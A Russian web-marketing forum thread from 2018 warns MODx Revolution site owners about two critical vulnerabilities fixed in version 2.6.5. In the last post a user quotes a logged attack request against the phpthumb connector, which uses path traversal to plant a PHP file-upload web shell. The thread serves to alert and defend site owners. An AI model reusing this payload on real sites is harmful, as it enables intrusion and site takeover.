2 Критических уязвимости в MODx Revolution - Форум об интернет-маркетинге
Этот сайт существует на доходы от рекламы.
Пожалуйста, выключите AdBlock.
Вернуться   Форум об интернет-маркетинге > >
Ответ
 
Опции темы
Старый 13.07.2018, 13:03   #1
Дрессировщик троянов
 
Аватар для gregzem
 
Регистрация: 22.11.2004
Адрес: localhost
Сообщений: 304
Репутация: 250706
Отправить сообщение для gregzem с помощью Skype™
Социальные сети Профиль в ВКонтакте Профиль на Хабрахабре Профиль в LinkedIn

По умолчанию 2 Критических уязвимости в MODx Revolution

Если ваш сайт работает на MODx Revolution, рекомендуем срочно обновить его до 2.6.5. Разработчики обнаружили (и уже исправили) в ней две критических уязвимости: первая позволяет одним запросом стереть сайт, вторая - загрузить произвольный файл (в том числе php-скрипт) и удаленно выполнить код (RCE).

https://modx.com/blog/modx-revolution-2.6.5

Данным уязвимостям подвержены все версии, включая 2.6.4.
gregzem вне форума   Ответить с цитированием
Сказали спасибо 2 пользователей:

Реклама
Старый 21.07.2018, 18:30   #2
Russ1an
Аспирант
 
Аватар для Russ1an
 
Регистрация: 25.03.2015
Сообщений: 145
Репутация: 18462

По умолчанию Re: 2 Критических уязвимости в MODx Revolution

Уязвимость коснулась только криворуких modx'еров, которые не переименовывают и не закрывают доступ к папке connectors и не переименовывают папку assets(при использовании компонента gallery).
Russ1an вне форума   Ответить с цитированием
Старый 22.07.2018, 09:38   #3
gregzem
Дрессировщик троянов
 
Аватар для gregzem
 
Регистрация: 22.11.2004
Адрес: localhost
Сообщений: 304
Репутация: 250706
Отправить сообщение для gregzem с помощью Skype™
Социальные сети Профиль в ВКонтакте Профиль на Хабрахабре Профиль в LinkedIn

ТопикСтартер Re: 2 Критических уязвимости в MODx Revolution

Ну, таких большинство. Причем, основной удар пришелся на 19-20 число, много сайтов "полегло". И проблема в том, что при заражении содержимое .js файлов заменяется на вредоносный инжект с редиректом на партнерку.

Атака выглядела примерно так:
Цитата:
POST 134.249.50.5 20/07/2018 11:14:05 http://****.com/en//connectors/system/phpthumb.php R: UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
post:
pv: ctx = web
pv: cache_filename = ../../dbs.php
pv: useRawIMoutput = 1
pv: src = .
pv: IMresizedData = <?php echo("#0x2515");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'Success_Upload!!!';}else{echo'Failed';}};};
pv: config_prefer_imagemagick = 0
Подробности еще можно почитать здесь https://modx.pro/security/15912#cut (в комментариях самое интересное)
gregzem вне форума   Ответить с цитированием
Ответ

Метки
modx , rce , безопасность , патч , уязвимость




Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Текущее время: 04:16. Часовой пояс GMT +3.

Регистрация Справка Календарь Поддержка Все разделы прочитаны